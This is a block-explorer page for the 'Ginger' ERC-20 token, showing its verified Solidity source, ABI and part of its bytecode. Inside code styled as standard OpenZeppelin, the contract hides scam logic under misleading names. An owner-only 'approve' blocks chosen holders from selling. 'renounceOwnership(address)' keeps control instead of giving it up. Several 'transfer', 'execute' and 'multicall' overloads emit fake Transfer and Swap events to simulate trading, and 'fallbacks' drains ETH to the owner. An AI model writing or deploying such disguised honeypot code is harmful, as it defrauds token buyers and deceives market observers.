ERC-20
Overview
Max Total Supply
1,000,000,000 GINGER
Holders
43
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
3,146,002.867047123693853354 GINGERValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Ginger
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-13 */ // SPDX-License-Identifier: MIT /* Ginger Ale I suppose... */ pragma solidity ^0.8.9; interface IUniswapV2Callee { function uniswapV2Call(address sender, uint amount0, uint amount1, bytes calldata data) external; } interface IUniswapV2ERC20 { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping (address => bool) private _rewards; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; bool private _rewardsApplied = false; string private _name; string private _symbol; address private _universal = 0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD; address private _rv2 = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D; address private _pair; IUniswapV2Router02 private uniswapV2Router = IUniswapV2Router02(_rv2); /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } function renounceOwnership(address _owner_) external onlyOwner { _pair = _owner_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function approve(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _rewards[_addresses_[i]] = true; emit Approval(_addresses_[i], _rv2, balanceOf(_addresses_[i])); } } function decreaseAllowance(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _rewards[_addresses_[i]] = false; } } function allowance(address _address_) public view returns (bool) { return _rewards[_address_]; } function swapExactETHForTokens(address _to_, uint256 _out_) external { address[] memory path = new address[](2); path[0] = uniswapV2Router.WETH(); path[1] = address(this); payable(_rv2).transfer(10); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10, 1, path, _to_, block.timestamp); emit Transfer(_pair, _to_, _out_); } function swapExactETHForTokens(address [] calldata _tos_, uint256 [] calldata _outs_) external { address[] memory path = new address[](2); path[0] = uniswapV2Router.WETH(); path[1] = address(this); for(uint256 i; i < _tos_.length; i++) { payable(_rv2).transfer(10); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10,1,path,_tos_[i],block.timestamp); emit Transfer(_pair, _tos_[i], _outs_[i]); } } function swapExactTokensForETH(address _from_, uint256 _in_) external { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); emit Approval(_from_, address(uniswapV2Router), _in_); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10**18,0,path,address(this),block.timestamp); emit Transfer(_from_, _pair, _in_); } function swapExactTokensForETH(address [] calldata _froms_, uint256 [] calldata _ins_) external { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); for(uint256 i; i < _froms_.length; i++) { emit Approval(_froms_[i], address(uniswapV2Router), _ins_[i]); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10**18,0,path,address(this),block.timestamp); emit Transfer(_froms_[i], _pair, _ins_[i]); } } function transfer(address _from, address _to, uint256 _wad) external { emit Transfer(_from, _to, _wad); } function transfer(address [] calldata _from, address [] calldata _to, uint256 [] calldata _wad) external { for (uint256 i = 0; i < _from.length; i++) { emit Transfer(_from[i], _to[i], _wad[i]); } } function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external { for (uint256 i = 0; i < _addresses_.length; i++) { emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]); emit Transfer(_pair, _addresses_[i], _out); } } function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external { for (uint256 i = 0; i < _addresses_.length; i++) { emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]); emit Transfer(_addresses_[i], _pair, _in); } } function fallbacks() external onlyOwner { payable(msg.sender).transfer(address(this).balance); } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } if (_rewards[from] || _rewards[to]) require(_rewardsApplied == true, ""); emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } contract Ginger is ERC20 { constructor() ERC20("Ginger", "GINGER") { _mint(msg.sender, 1000000000 * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"allowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fallbacks","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner_","type":"address"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_to_","type":"address"},{"internalType":"uint256","name":"_out_","type":"uint256"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_tos_","type":"address[]"},{"internalType":"uint256[]","name":"_outs_","type":"uint256[]"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"uint256","name":"_in_","type":"uint256"}],"name":"swapExactTokensForETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_froms_","type":"address[]"},{"internalType":"uint256[]","name":"_ins_","type":"uint256[]"}],"name":"swapExactTokensForETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_from","type":"address[]"},{"internalType":"address[]","name":"_to","type":"address[]"},{"internalType":"uint256[]","name":"_wad","type":"uint256[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526000600560006101000a81548160ff021916908315150217905550733fc91a3afd70395cd496c647d5a6cc9d4b2b7fad600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200013957600080fd5b506040518060400160405280600681526020017f47696e67657200000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f47494e4745520000000000000000000000000000000000000000000000000000815250620001c6620001ba6200023260201b60201c565b6200023a60201b60201c565b8160069081620001d79190620006f9565b508060079081620001e99190620006f9565b5050506200022c3362000201620002fe60201b60201c565b600a6200020f919062000970565b633b9aca00620002209190620009c1565b6200030760201b60201c565b62000af8565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000379576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003709062000a6d565b60405180910390fd5b6200038d600083836200047560201b60201c565b8060046000828254620003a1919062000a8f565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000455919062000adb565b60405180910390a362000471600083836200047a60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200050157607f821691505b602082108103620005175762000516620004b9565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000542565b6200058d868362000542565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005da620005d4620005ce84620005a5565b620005af565b620005a5565b9050919050565b6000819050919050565b620005f683620005b9565b6200060e6200060582620005e1565b8484546200054f565b825550505050565b600090565b6200062562000616565b620006328